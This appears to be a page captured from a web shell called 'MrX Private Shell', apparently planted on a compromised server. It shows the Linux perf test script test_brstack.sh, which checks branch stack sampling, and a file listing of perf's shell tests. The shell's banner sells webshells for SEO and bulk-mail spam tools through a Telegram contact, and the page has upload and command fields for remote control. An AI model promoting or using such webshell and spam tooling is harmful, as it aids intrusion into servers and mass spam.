__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
#!/bin/sh
# Check branch stack sampling

# SPDX-License-Identifier: GPL-2.0
# German Gomez <[email protected]>, 2022

shelldir=$(dirname "$0")
# shellcheck source=lib/perf_has_symbol.sh
. "${shelldir}"/lib/perf_has_symbol.sh

# skip the test if the hardware doesn't support branch stack sampling
# and if the architecture doesn't support filter types: any,save_type,u
if ! perf record -o- --no-buildid --branch-filter any,save_type,u -- true > /dev/null 2>&1 ; then
	echo "skip: system doesn't support filter types: any,save_type,u"
	exit 2
fi

skip_test_missing_symbol brstack_bench

TMPDIR=$(mktemp -d /tmp/__perf_test.program.XXXXX)
TESTPROG="perf test -w brstack"

cleanup() {
	rm -rf $TMPDIR
}

trap cleanup EXIT TERM INT

test_user_branches() {
	echo "Testing user branch stack sampling"

	perf record -o $TMPDIR/perf.data --branch-filter any,save_type,u -- ${TESTPROG} > /dev/null 2>&1
	perf script -i $TMPDIR/perf.data --fields brstacksym | tr -s ' ' '\n' > $TMPDIR/perf.script

	# example of branch entries:
	# 	brstack_foo+0x14/brstack_bar+0x40/P/-/-/0/CALL

	set -x
	grep -E -m1 "^brstack_bench\+[^ ]*/brstack_foo\+[^ ]*/IND_CALL/.*$"	$TMPDIR/perf.script
	grep -E -m1 "^brstack_foo\+[^ ]*/brstack_bar\+[^ ]*/CALL/.*$"	$TMPDIR/perf.script
	grep -E -m1 "^brstack_bench\+[^ ]*/brstack_foo\+[^ ]*/CALL/.*$"	$TMPDIR/perf.script
	grep -E -m1 "^brstack_bench\+[^ ]*/brstack_bar\+[^ ]*/CALL/.*$"	$TMPDIR/perf.script
	grep -E -m1 "^brstack_bar\+[^ ]*/brstack_foo\+[^ ]*/RET/.*$"		$TMPDIR/perf.script
	grep -E -m1 "^brstack_foo\+[^ ]*/brstack_bench\+[^ ]*/RET/.*$"	$TMPDIR/perf.script
	grep -E -m1 "^brstack_bench\+[^ ]*/brstack_bench\+[^ ]*/COND/.*$"	$TMPDIR/perf.script
	grep -E -m1 "^brstack\+[^ ]*/brstack\+[^ ]*/UNCOND/.*$"		$TMPDIR/perf.script
	set +x

	# some branch types are still not being tested:
	# IND COND_CALL COND_RET SYSCALL SYSRET IRQ SERROR NO_TX
}

# first argument <arg0> is the argument passed to "--branch-stack <arg0>,save_type,u"
# second argument are the expected branch types for the given filter
test_filter() {
	test_filter_filter=$1
	test_filter_expect=$2

	echo "Testing branch stack filtering permutation ($test_filter_filter,$test_filter_expect)"

	perf record -o $TMPDIR/perf.data --branch-filter $test_filter_filter,save_type,u -- ${TESTPROG} > /dev/null 2>&1
	perf script -i $TMPDIR/perf.data --fields brstack | tr -s ' ' '\n' | grep '.' > $TMPDIR/perf.script

	# fail if we find any branch type that doesn't match any of the expected ones
	# also consider UNKNOWN branch types (-)
	if grep -E -vm1 "^[^ ]*/($test_filter_expect|-|( *))/.*$" $TMPDIR/perf.script; then
		return 1
	fi
}

set -e

test_user_branches

test_filter "any_call"	"CALL|IND_CALL|COND_CALL|SYSCALL|IRQ"
test_filter "call"	"CALL|SYSCALL"
test_filter "cond"	"COND"
test_filter "any_ret"	"RET|COND_RET|SYSRET|ERET"

test_filter "call,cond"		"CALL|SYSCALL|COND"
test_filter "any_call,cond"		"CALL|IND_CALL|COND_CALL|IRQ|SYSCALL|COND"
test_filter "cond,any_call,any_ret"	"COND|CALL|IND_CALL|COND_CALL|SYSCALL|IRQ|RET|COND_RET|SYSRET|ERET"

Filemanager

Name Type Size Permission Actions
base_probe Folder 0755
base_report Folder 0755
common Folder 0755
coresight Folder 0755
lib Folder 0755
annotate.sh File 2.08 KB 0755
attr.sh File 385 B 0755
buildid.sh File 4.15 KB 0755
daemon.sh File 11.31 KB 0755
diff.sh File 1.93 KB 0755
ftrace.sh File 2.22 KB 0755
list.sh File 756 B 0755
lock_contention.sh File 8.9 KB 0755
perftool-testsuite_probe.sh File 575 B 0755
perftool-testsuite_report.sh File 578 B 0755
pipe_test.sh File 3.22 KB 0755
probe_vfs_getname.sh File 440 B 0755
record+probe_libc_inet_pton.sh File 3.43 KB 0755
record+script_probe_vfs_getname.sh File 1.53 KB 0755
record+zstd_comp_decomp.sh File 1.12 KB 0755
record.sh File 8.27 KB 0755
record_bpf_filter.sh File 4.37 KB 0755
record_lbr.sh File 3.46 KB 0755
record_offcpu.sh File 2.07 KB 0755
record_sideband.sh File 1.07 KB 0755
script.sh File 2.01 KB 0755
stat+csv_output.sh File 2 KB 0755
stat+csv_summary.sh File 611 B 0755
stat+json_output.sh File 5.02 KB 0755
stat+shadow_stat.sh File 2.08 KB 0755
stat+std_output.sh File 2.96 KB 0755
stat.sh File 6.36 KB 0755
stat_all_metricgroups.sh File 1016 B 0755
stat_all_metrics.sh File 1.83 KB 0755
stat_all_pfm.sh File 1.17 KB 0755
stat_all_pmu.sh File 1.73 KB 0755
stat_bpf_counters.sh File 2 KB 0755
stat_bpf_counters_cgrp.sh File 1.66 KB 0755
stat_metrics_values.sh File 844 B 0755
test_arm_callgraph_fp.sh File 1.18 KB 0755
test_arm_coresight.sh File 5.7 KB 0755
test_arm_coresight_disasm.sh File 1.97 KB 0755
test_arm_spe.sh File 3.71 KB 0755
test_arm_spe_fork.sh File 1.03 KB 0755
test_brstack.sh File 2.97 KB 0755
test_data_symbol.sh File 1.95 KB 0755
test_intel_pt.sh File 17.2 KB 0755
test_java_symbol.sh File 1.96 KB 0755
test_perf_data_converter_json.sh File 1.32 KB 0755
test_stat_intel_tpebs.sh File 848 B 0755
test_task_analyzer.sh File 4.8 KB 0755
test_uprobe_from_different_cu.sh File 1.63 KB 0755
trace+probe_vfs_getname.sh File 1.45 KB 0755
trace_btf_enum.sh File 1.35 KB 0755
trace_btf_general.sh File 2.03 KB 0755
trace_exit_race.sh File 1.22 KB 0755
Filemanager